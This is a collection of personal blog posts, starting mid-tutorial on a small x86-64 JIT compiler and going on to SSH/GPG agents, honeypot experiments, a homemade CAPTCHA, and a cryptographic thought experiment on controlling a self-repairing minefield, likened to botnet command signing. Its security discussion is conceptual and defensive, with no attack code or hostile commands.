So we know the assembly, but what do we pass to asmbuf_ins()? This is where we get our hands dirty.

Finding the Code

If you want to do this the Right Way, you go download the x86-64 documentation, look up the instructions we’re using, and manually work out the bytes we need and how the operands fit into it. You know, like they used to do out of necessity back in the 60’s.

Fortunately there’s a much easier way. We’ll have an actual assembler do it and just copy what it does. Put both of the instructions above in a file peek.s and hand it to nasm. It will produce a raw binary with the machine code, which we’ll disassemble with nidsasm (the NASM disassembler).

$ nasm peek.s
$ ndisasm -b64 peek
00000000  4889F8            mov rax,rdi
00000003  C3                ret

That’s straightforward. The first instruction is 3 bytes and the return is 1 byte.

asmbuf_ins(buf, 3, 0x4889f8);  // mov   rax, rdi
// ... generate code ...
asmbuf_ins(buf, 1, 0xc3);      // ret

For each operation, we’ll set it up so the operand will already be loaded into rdi regardless of the operator, similar to how the argument was passed in the first place. A smarter compiler would embed the immediate in the operator’s instruction if it’s small (32-bits or fewer), but I’m keeping it simple. To sneakily capture the “template” for this instruction I’m going to use 0x0123456789abcdef as the operand.

mov   rdi, 0x0123456789abcdef

Which disassembled with ndisasm is,

00000000  48BFEFCDAB896745  mov rdi,0x123456789abcdef
         -2301

Notice the operand listed little endian immediately after the instruction. That’s also easy!

long operand;
scanf("%ld", &operand);
asmbuf_ins(buf, 2, 0x48bf);         // mov   rdi, operand
asmbuf_immediate(buf, 8, &operand);

Apply the same discovery process individually for each operator you want to support, accumulating the result in rax for each.

switch (operator) {
    case '+':
        asmbuf_ins(buf, 3, 0x4801f8);   // add   rax, rdi
        break;
    case '-':
        asmbuf_ins(buf, 3, 0x4829f8);   // sub   rax, rdi
        break;
    case '*':
        asmbuf_ins(buf, 4, 0x480fafc7); // imul  rax, rdi
        break;
    case '/':
        asmbuf_ins(buf, 3, 0x4831d2);   // xor   rdx, rdx
        asmbuf_ins(buf, 3, 0x48f7ff);   // idiv  rdi
        break;
}

As an exercise, try adding support for modulus operator (%), XOR (^), and bit shifts (<, >). With the addition of these operators, you could define a decent PRNG as a recurrence relation. It will also eliminate the closed form solution to this problem so that we actually have a reason to do all this! Or, alternatively, switch it all to floating point.

Calling the Generated Code

Once we’re all done generating code, finalize the buffer to make it executable, cast it to a function pointer, and call it. (I cast it as a void * just to avoid repeating myself, since that will implicitly cast to the correct function pointer prototype.)

asmbuf_finalize(buf);
long (*recurrence)(long) = (void *)buf->code;
// ...
x[n + 1] = recurrence(x[n]);

That’s pretty cool if you ask me! Now this was an extremely simplified situation. There’s no branching, no intermediate values, no function calls, and I didn’t even touch the stack (push, pop). The recurrence relation definition in this challenge is practically an assembly language itself, so after the initial setup it’s a 1:1 translation.

I’d like to build a JIT compiler more advanced than this in the future. I just need to find a suitable problem that’s more complicated than this one, warrants having a JIT compiler, but is still simple enough that I could, on some level, justify not using LLVM.

SSH and GPG Agents

2012-06-08T00:00:00Z

If you’re using SSH or GPG with any sort of frequency, you should definitely be using their accompanying *-agent programs. The agents allow you to gain a whole lot of convenience without compromising your security. Many people seem to be unaware these tools exist, so here’s an overview along with some tips on how to use them effectively.

Let’s start from the top.

Both SSH and GPG involve the use of asymmetric encryption, and the private key is protected by a user-entered passphrase. The private key is generally never written in to the filesystem in plaintext. In the case of GPG, these keys are the primary focus of the application. For SSH, they’re a useful tool to make accessing remote machines less tedious. (The SSH server is authenticated by a public key, too, but this is unrelated to agents.)

For those who are unaware, rather than enter a password when logging into a remove machine, you can identify yourself by a public key. Generating a key is simple.

ssh-keygen

You’ll almost certainly want to accept the default location for the key (~/.ssh/id_rsa) because this is where SSH will look for it. Make sure you enter a passphrase, which will encrypt the private key. The reason this is important is because, without it, anyone who gains access to your id_rsa file will be able to access any remote systems that have been told to trust your public key. By having a passphrase, this person needs not only the id_rsa file, but also the passphrase (two-factor authentication), so you probably want to pick a long, strong one. This may sound inconvenient, but ssh-agent will help you.

The key generation process will create two files: id_rsa (private key) and id_rsa.pub (public key). The latter is what you give to remote systems.

Telling a remote system about your key is simple,

ssh-copy-id

This will copy your id_rsa.pub to the remote system, prompting you for the password on the remote system (not the passphrase you just entered), adding it to the file ~/.ssh/authorized_keys. From this point on, all logins will use your new keypair rather than prompt you for a password. Since you put a passphrase on your key, this may seem pointless — it seems you still need to type in a password for every connection. Bear with me here!

As a side note, you should have a unique SSH keypair for each site, so you’ll have several of them. This way you can revoke access to a particular site without affecting the others.

For GPG — the GNU Privacy Guard, the free software PGP implementation — your keys are stored under ~/.gnupg/ in a database. Generating a key is also a simple command,

gpg --gen-key

This is a slightly more complicated process, which I won’t get into here. In contrast to SSH, you’ll generally have only one keypair per identity (i.e. you only have one).

So you’ve got these keys are encrypted by passphrases. If they’re going to be any use then they’ll be long, annoying things that are a pain to type in. If that was the end of the story this would be really inconvenient, enough to make the use of passphrases too costly for many people to bother. Fortunately, we have agents to help.

An agent is a daemon process that can hold onto your passphrase (gpg-agent) or your private key (ssh-agent) so that you only need to enter your passphrase once within in some period of time (possibly for the entire life of the agent process), rather than type it many times over and over again as it’s needed. The agents are very careful about how they hold on to this sensitive information, such as avoiding having it written to swap. You can also configure how long you want them to hold onto your passphrase/key before purging it from memory.

The ssh and gpg programs need to know where to find the agents. This is done through environmental variables. For ssh-agent, the process ID is stored in SSH_AGENT_PID and the location of the Unix socket for communication is in SSH_AUTH_SOCK. gpg-agent stuffs everything into one variable, GPG_AGENT_INFO (which is a pain if you want to use this information in a script). When the main program is invoked and it needs to use the private key, it will use these variables and get in touch with the agent to see if it can supply the needed information without bothering the user.

Remember, a process can’t change the environment of their parent process so you need to set this information in the agent’s parent shell somehow. There are two methods to set these up: eval and exec.

When you start the agent, it forks off its daemon process and prints the variable information to stdout. This can be evaled directly into the current environment. You could drop these lines directly in your .bashrc so that the agents are always there. (Though they won’t exit with your shell, lingering around uselessly! More on this ahead.)

eval $(ssh-agent)
eval $(gpg-agent --daemon)

For the exec method, you replace your current shell with a new one with a modified environment. To do this, you ask the agent to exec into a shell, with the variables set, rather than return control.

exec ssh-agent bash
exec gpg-agent --daemon bash

As cool trick, you can chain these together. ssh-agent becomes gpg-agent which then becomes bash.

exec ssh-agent gpg-agent --daemon bash

Note that gpg-agent is capable of being an ssh-agent as well by using the --enable-ssh-support option, so you don’t need to launch an ssh-agent. Unfortunately, I don’t like to use this because gpg-agent gets a little too personal with the SSH key, storing its own copy with its own passphrase again.

On the other hand, gpg-agent is much more advanced than OpenSSH’s ssh-agent. When you want to have ssh-agent manage a key, you need to first tell it about the key with ssh-add. With no arguments, it will use ~/.ssh/id_rsa. If you forget to do this, ssh will ask for your passphrase directly, in your terminal, not allowing ssh-agent to hold onto it. By comparison, gpg will always ask gpg-agent to retrieve your passphrase when it’s needed (if the agent is available), so it will cache your passphrase on demand. No need to explicitly register with the agent. Even better, it will try its best to use a “PIN entry” program to read your key, which helps protect against some kinds of keyloggers — preventing other processes from seeing your keystrokes.

Well, this is all fine and dandy except when you’ve already got an agent running. Say you’re launching a new terminal emulator window from an existing one, creating a new shell. Unfortunately, even though you have agents running and they’re listed in your environment (from the origin shell), they’ll still spawn new agents! This is really lousy behavior, in my opinion. There’s no --inherit option to tell them to silently pass along the information of the existing agent if it appears to be valid. This causes two problems. One, you’ll need to enter your passphrases again for the new agent. Second, these new agents will linger around after the spawning shell has exited — hogging important non-swappable memory.

The direct workaround is to, in your shell init script, check for these variables yourself and check that they’re valid (the agent process is still running) before trying to spawn any agents. This is tedious, error-prone, and makes each user do a lot of work that could have been done in one place by one person instead.

There’s still the problem of when you launch a new shell that doesn’t inherit the variables (i.e. a remote login), so there’s no way for it to be aware of the existing agents. To fix this, you’d need to write the agent information to a file. The shell init script checks this file for an existing agent before spawning one. This is even more complicated, more error-prone, and subject to race-conditions. Why make every use go through this process?!

Fortunately someone’s done all this work so you don’t have to! There’s an awesome little tool called Keychain which can be used to launch the agents for you. It stores the agent information in a file so that you only ever launch one instance of the agent, and the agents will be shared across every shell. It does have an --inherit option — the default behavior, so you don’t even need to ask nicely. Instead of running the *-agents directly, you just put this in your .bashrc,

eval $(keychain --eval --quiet)

So simple and it just works! I was so happy when I found this. This is the magic word that makes using agents a breeze, so I can’t recommend it enough.

SSH Honeypots

2012-05-19T00:00:00Z

Three years ago I was experimenting with high-interaction SSH honeypots. I failed to document the effort as a blog post afterwards. Fortunately, I’ve been experimenting with honeypots again, so I’m taking the time to document it this time.

A honeypot is a fake service or computer on a network used in detecting and deflecting attacks on the network. Ideally, an attacker is unable to tell honeypots apart from real systems, attacking the honeypots instead. In general, honeypots fall into two categories: high-interaction and low-interaction. The former will imitate a real system with high fidelity while the latter may just listen for connections on common ports, without actually accepting or sending data.

What triggered my curiosity was that I wanted to put OpenBSD’s securelevel(7) feature to the test. In short, it’s a runtime system value that ranges from -1 (least secure) to 2 (most secure), and it’s not possible to decrease the level without gaining physical access to the system. Each increase makes the system more read-only, and less flexible, so it’s a trade-off. A system running at level 2 should not carry over any state between boots — like a LiveCD on a system with no disks.

I set up a fresh OpenBSD install in a QEMU virtual machine, locked the system down with securelevel at 1, forwarded the SSH port all the way out to the Internet, and than gave Gavin the root password. I told him to go nuts, with the ultimate goal that when he was done I should be unable to tell he had even logged into the system. All of the system logs were set to append-only, enforced through the kernel by securelevel, so this should have been a very difficult task indeed.

It turned out he was much more successful than I expected. When he told me he was done, I SSHed into the system to check the logs finding that there were no entries indicating he logged in at all. The only proof I could find that he was actually in was a message he intentionally left behind for me. Did he just subvert securelevel?!

Turns out not quite. Whew! I was just putting too much trust into a system I knew was compromised. He mounted a loopback filesystem over top of the /var/log, then filled it with fake logs. He also sabotaged the mount programs so that they’d hide the loopback mount from me. Since the mount programs were on a read-only system, he had to do a loopback mount there, too. After restarting OpenSSH, it was no longer writing to the append-only log, but to the doctored log.

So, the proper way to check your security logs is by mounting the compromised filesystem in a known trusted system — or, in this case, just rebooting would have fixed it. Even with securelevel, you can’t check the compromised system in-place. Let this be a lesson to all those amateur sysadmins out there (including me)!

We did a second round and he managed to trick me again by taking me further into the rabbit hole. Instead of loopback mounts, since I was expecting that, he had root log into a chroot environment, filled with a full copy of the system including fake logs. This version survived reboots and really required inspection from an external system.

After all this, I wanted to crank things up a notch by letting some real attackers into my test system. I was already accustomed to seeing many password-guesses on my SSH server in the logs, so getting someone into my honeypot wouldn’t take long at all. While I didn’t care of they trashed my VM — restoring from snapshot was an automatic process — I really didn’t want them to take advantage of my Internet connection, using it for DDoS attacks or pivoting to attack other SSH servers. So I needed a way to allow them in though SSH, but not allow any other traffic out.

If I was doing this today, I’d probably use iptables to only allow SSH in, and then bridge the VM to the Internet with a TUN/TAP, replacing my real SSH server on port 22. However, three years ago I didn’t know how to do this. Instead I found a really simple hack to get this done: tsocks. tsocks adds SOCKS proxying to any application by replacing the sockets API with its own. In my case, I wrapped the VM in tsocks configured to use a non-existent SOCKS proxy (127.0.0.1). It could accept any incoming connection (though limited to SSH because of NAT) but unable to make any outgoing connections. Perfect!

I hadn’t realized it yet, but this was a high-interaction SSH honeypot I created.

I set the root password to “password” and let it go for awhile, tailing the OpenSSH logs to watch for activity. The brute-force bots would eventually make their way inside but immediately log out and keep guessing passwords for root. Either they were really poorly programmed or they were specifically testing for honeypots that allow different passwords. They must have logged the address for a human to investigate some time in the future, because I never witnessed any shell activity. On the other hand, this was all very difficult to observe, for the same reasons Gavin was able to cover his tracks. My honeypot was useful for catching and detecting attackers, but it wasn’t good for observing them in action.

While I was investigating this I came across Kojoney, which is a low-interaction SSH honeypot mainly for seeing what sorts of passwords attackers were guessing. Unfortunately, I could never get it to work, so I never used it.

Several years passed and I recently came across a project that didn’t exist last time: kippo, a “medium”-interaction SSH honeypot. This is everything I was looking for before. It doesn’t require a full-blown VM, it’s has high fidelity interaction, it’s safe, and it allows me to fully observe all activity — it even records the tty session for replay. Cool!

kippo is written in pure Python, so there shouldn’t be any buffer overflows, and doesn’t execute any external programs. It should be safe, but I’m not aware of any real security reviews, so it’s a use-at-your-own risk thing. They warn about this on their website.

I’ve run this off and on on the weekends. Since I haven’t run my real SSH server on port 22 since 2009 (no recorded attacks since!), my IP address atracts much less attention than before, so it hasn’t seen too much activity. I have had two humans connect and log in. Both downloaded a well-known script kiddie tool called go.sh. Here’s an analysis of the tool by someone who was actually attacked with it: SSH Bruteforce.

In fact, go.sh is so well known that it gave me a little scare. In my tty recording it looked like the tool was actually executed! The skull banner printed out and it had an interface. I was really nervous until I found kippo’s malware.py. Kippo actually recognizes some script kiddie tools and imitates their interfaces to further confuse attackers. I do run kippo as an unprivileged user so it wouldn’t be the end of the world if something did happen, but I’d still be uncomfortable.

There’s neat feature of kippo, which hilariously caught Gavin off-guard when I had him poke at it. kippo will never disconnect a session on its own. If an exit or C-d is given, it drops into another fake shell with the hostname “localhost”, merely pretending to log out. That way you get a chance to see some commands the attackers are meaning to run on their own system, before they realize their mistake. The only way to disconnected is to either close your terminal emulator or use SSH’s ~. escape sequence.

I’ve been considering running kippo all the time with no password set — using it as a true honeypot. This would help keep anyone from finding my real SSH server, since they would find the honeypot and stop searching other ports. It would also waste time that could be spent attacking other people’s real SSH servers, helping to protect other servers out there. My real SSH server (on my router) doesn’t allow password logins, only key logins, so I already feel pretty good about its security. I’ve never seen a brute-force attempt on the current port anyway. But if I do, I now have kippo as another tool in my security toolbelt.

I Finally Have Comments

2009-05-12T00:00:00Z

Update: This post is referring to my old web hosting situation. I'm now using external comment hosting because my blog is now statically hosted.

I finally have a comment system, thanks to pollxn, a blosxom comment system that actually works. There is a link to it, indicating the number of comments, in the bottom of each post. Try it out and say hello.

Unfortunately, pollxn doesn't have any sort of anti-spam or CAPTCHA system. If you look around the Interwebs where other people are using pollxn, you will see everyone has their own little CAPTCHA thing. Well, I am not different. I hacked together my own to keep away automated spammers.

It selects words from the dictionary (of 40,000 words in this case) and encrypts them with Blowfish in CBC mode, with a unique IV each time. This is to passed to the user, who passes it to an image generator which decrypts the word and uses GD in Perl to render it, apply some transforms, and drop a line randomly over it. The user submits the guess of the image along with the encrypted version (hidden field), which is decrypted and compared on the other end. The same encrypted ID cannot be used twice, but thanks to the IV the same word can be used twice.

Here are some samples. If you hit refresh, they will render differently. (Update: not any more. These are just static examples now.)

It's not a great CAPTCHA, but it should be good enough for the low volume of traffic I see here. As I inevitably collect small amounts of spam (by spammers manually passing the CAPTCHA), I will gradually create the needed tools to combat it. I can also easily update the CAPTCHA image algorithm without disrupting the functioning of the website.

I'm sure I will be making improvements to the comment system over time as well. I should make it obfuscate e-mail addresses, for one. Maybe add a preview. And better blosxom integration.

So say hello below! I am excited to finally have a real blog.

Controlling a Minefield

2008-12-16T00:00:00Z

Some time ago I was watching through the entire series of Deep Space 9. It was a Star Trek television show about a space station that rests next a wormhole that connects to the other side of the galaxy (The Delta quadrant).

The Delta quadrant is ruled by a group called the Dominion, and they are looking to conquer the Federation side of the galaxy (the Alpha quadrant). At one point during the series, the Federation needs to temporarily disable the wormhole to prevent Dominion ships from crossing through. They do this by mining the wormhole with identical, cloaked, self-replicating mines.

If a mine is destroyed, the neighboring mines will replicate a replacement. The minefield repairs itself. This makes removing the minefield within a reasonable amount of time difficult to impossible. If even a single mine is left behind, it can replicate the entire minefield again.

The most interesting question here is this:

When the Federation returns and wants to remove the minefield, how would they do it? What would stop the Dominion from doing the same thing?

The first thing that comes to mind is having a kill signal, but what would this signal be? It could simply be a plain "kill" command, but the Dominion could also broadcast such a signal to disable the minefield. Consider that the Dominion could capture a single mine and study everything about its workings. The minefield itself could therefore hold no secrets whatsoever. This leaves out any possibility of a secret kill command stored in the mines.

Here's what I would do, assuming that humans or aliens have not yet discovered some giant breakthrough in factoring in the Star Trek universe. I would randomly generate two very large prime numbers. Today, two 1024-bit primes should be more than enough, but in 350 years even larger numbers would probably be necessary. Then, I multiply these two number together and store this number in the mine software. To disable the minefield, I simply broadcast these two numbers into the minefield. The mines would be programmed to take the product of any pairs of numbers it receives. If the product matches the internal number, the mine shuts down.

Voila! A method for shutting down the minefield. The enemy can know everything about every single mine's construction, including the software and data stored on every mine, but will be unable to disable the minefield without factoring a very large composite number, which would presumably be difficult or impossible (within a reasonable amount of time).

Another possibility would be using a hash. Come up with a strong passphrase, then use a hashing algorithm like SHA-1 or MD5, or whatever is available and appropriate in 350 years, to hash the passphrase. Store the hash in the mines. When you want to disable the minefield, broadcast the passphrase. These mines will hash the broadcast and compare it to the stored hash. It's really the same solution as before: a one-way function. This is also similar to how passwords are stored inside a computer today.

If we wanted more commands, like "don't blow up any ships for awhile" or "increase minefield density", we could generate more composites corresponding to each command. However, once a command is issued, the secret — the two prime numbers — is out, and it cannot be used again. In this case, I would go into the realm of public key cryptography.

I would issue a command, along with a timestamp, and maybe even a nonce that could double as a global identifier for the command, and sign the whole deal using my private key. On each mine I would store the public key. When a command is received, the mines would check the signature before executing the command. I could then issue repeat commands, as the timestamps would change each time. An adversary learns nothing when a command is issued, because the time stamps would make any replay attacks useless.

Minefields just like this exist today all over the Internet, as botnets. Thousands of computers all around the world become infected with malware and come under the control of a single individual or group. Individual machines in the botnet could be taken out, but removing the entire botnet is difficult as it grows and repairs itself. Any security researcher could disassemble the botnet malware and learn anything about it, so the malware can store no secrets. How does a malicious person control the botnet, then, without someone else taking control? Public key cryptography, just as described above.